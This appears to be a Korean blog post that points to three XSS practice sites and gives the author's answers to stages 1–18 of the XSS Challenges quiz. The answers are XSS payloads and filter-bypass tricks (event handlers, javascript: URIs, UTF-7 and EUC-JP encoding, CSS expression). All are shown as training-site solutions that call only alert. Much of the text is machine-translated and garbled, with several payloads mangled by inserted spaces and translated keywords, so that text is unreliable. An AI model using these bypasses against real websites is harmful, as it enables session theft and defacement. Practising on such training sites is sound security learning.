XSS 공격 실전 테스트 사이트

1.xxs공격 테스트 사이트 XSS Challenges

http://xss-quiz.int21h.jp/

정답: 페이지 마지막 확인

2.xss공격 테스트 사이트 prompt(1) to win

http://prompt.ml/0

정답:https://github.com/cure53/XSSChallengeWiki/wiki/prompt.ml

3.xxs공격 테스트 사이트 alert(1) to win

http://escape.alf.nu/

정답:http://blog.nsfocus.net/alert1-to-win-write-up/

4.첫번째 사이트 XSS Challenges 정답

1단계:<img onerror="alert(document.domain);" src=>
2단계:"><script>alert(document.domain);</script>

3단계 :
http://xss-quiz.int21h.jp/stage-3.php?sid=93de7707279b3a5ae4ce419bfc7c0b1f380a20f6
힌트:The input in text box is properly escaped
그러나 입력 지점은 여기에만 있는건 아닙니다.


4단계 :
http://xss-quiz.int21h.jp/stage_4.php?sid=a311bc75ede604bb9d9d1cf566117401218f789c
hidden的input입력점:" onmouseover="alert(document.domain);" type="text :(
"><script>alert(document.domain);</script>

5단계 :
http://xss-quiz.int21h.jp/stage--5.php?sid=646d0cc8a8f21e2e32b36910462f1fcf8513a60d
"onmouseover ="alert (document.domain); "type ="텍스트를 사용할 수 있습니다. 변조 데이터 프록시에서 클라이언트 길이 제한을 무시하십시오.

6단계 :
http://xss-quiz.int21h.jp/stage-no6.php?sid=521453f94fdb4c3e538b27cca9f1cc771edc0b1a
"onmouseover ="경고 (document.domain); "x ="는 여전히 동일합니다. .

7단계 :
http://xss-quiz.int21h.jp/stage07.php?sid=fc33ef87ee482ad559e828f80803a9645ea2cc19
onmouseover = alert (document.domain);이 필터링 변형은 약간 흥미 롭습니다.

8단계 :
http://xss-quiz.int21h.jp/stage008.php?sid=b2d11d0122ac031aefde2490f623af51c6dc4af4
javascript : alert (document.domain); // JS 의사 프로토콜

9단계 :
http://xss-quiz.int21h.jp/stage_09.php?sid=5b3848609d2b7d7eaa76b3c2fe1107b4e027f441
+ ACI- 마우스 오버 = + ACI- 경고 (document.domain) + ADsAIg-x = + ACI-
utf-7
실제 테스트 : + 코드는 % 2b
p1 = 1 % 2bACI- onmouseover = % 2bACI-alert (document.domain) % 2bADsAIg- ​​x = % 2bACI- & charset = euc-jp

10단계 :
http://xss-quiz.int21h.jp/stage00010.php?sid=ebbdd5208bce92c3c26c5da4e79c3a0086f16d5e
팁 : s / domain // g; 
"onmouseover = alert (document.domdomainain); x ="

11단계 :
http://xss-quiz.int21h.jp/stage11th.php?sid=2ea843cedd78f5b9dfd684cc00be42481f72449c
: 示 : "s / script / xscript / ig;" 및 "s / on [az] + = / onxxx = / ig;" 그리고 "s / style = / stxxx = / ig;"
"> <iframe src ="javascr & # 09; ipt : alert (document.domain); "> </ iframe> 이것은 가능하지만 다음 단계는 아닙니다.
"> <a href="javascr	ipt:alert(document.domain);"> 12 </a> 下一 关 ……

12단계 :
http://xss-quiz.int21h.jp/stage_no012.php?sid=62c192a540aba87e7b6796ce0cbc2cd93fcb0750
팁 : "s / [\ x00- \ x20 \ <\> \"\ '] // g; " 
``onmouseover = 경고 (document.domain); 다음 단계 ...

13단계 :
http://xss-quiz.int21h.jp/stage13_0.php?sid=00696ab8c69d8a146bc35d5e65b6a7c270eaf1f0
background-color : # f00; background : url ( "javascript : alert (document.domain);");

14단계 :
http://xss-quiz.int21h.jp/stage-_-14.php?sid=7188bd9374f7397e0a67044cfcf721c6be036b83
팁 : s / (url | script | eval | expression) / xxx / ig
cos : expres / ** / sion (if (! window.x) {alert (document.domain); window.x = 1;})

15단계 :
http://xss-quiz.int21h.jp/stage__15.php?sid=26ac2a0522c04a788c217fd8d7847aab1626f726
팁 : document.write (); 
\ x3cscript \ x3ealert (문서. 도메인); \ x3c / script \ x3e

16단계 :
http://xss-quiz.int21h.jp/stage00000016.php?sid=f4aed769ab48312e8815f3b63f32e2984a4ebb88
: 示 : "document.write ();" 그리고 "s / \\ x / \\\\ x / ig;"
\ u003cscript \ u003ealert (문서. 도메인); \ u003c / script \ u003e
십진수를 사용할 수도 있습니다. 이런 식으로

17단계 :
http://xss-quiz.int21h.jp/stage-No17.php?sid=86908f4e2c28923d9280baebd67f4d9f009b5fa5
팁 : 멀티 바이트 문자
euc-jp의 코딩 범위 :
바이트 1이 8E 인 경우 2 바이트 인코딩이고 바이트 2 범위는 A1-DF입니다.
바이트 1 범위가 A1-FE 인 경우 2 바이트 인코딩이고 바이트 2 범위는 A1-FE입니다.
바이트 1이 8F 인 경우 3 바이트 인코딩이며 바이트 2와 바이트 3의 범위는 모두 A1-FE입니다.
두 개의 폼 요소 모두 최종 큰 따옴표를 닫기 위해 A7을 제출합니다. 소스 코드를 보는 것이 성공적인 이유는 무엇입니까? 주소 표시 줄에 직접 무기력 함 : javascript : alert (document.domain);
이제 브라우저 버전 문제라는 것이 밝혀졌습니다. IE8을 사용하지 마십시오.
p1 = 1 % A7 & p2 = + onmouseover % 3Dalert % 28document.domain % 29 % 3B + % A7

18단계 :
http://xss-quiz.int21h.jp/stage__No18.php?sid=e9cd87a31a1b373f6283b698f3762758db319f2b
팁 : us-ascii 높은 비트 문제 
41-5A, 61-7A (숫자와 기호가 포함 된 경우 21-7E)
IE8을 사용하지 마십시오. 이러한 취약점은 IE8에서 패치되었습니다.
p1 = % A2 % BE % BCscript % BEalert (document.domain); % BC / script %BE

답글 남기기

이메일 주소는 공개되지 않습니다.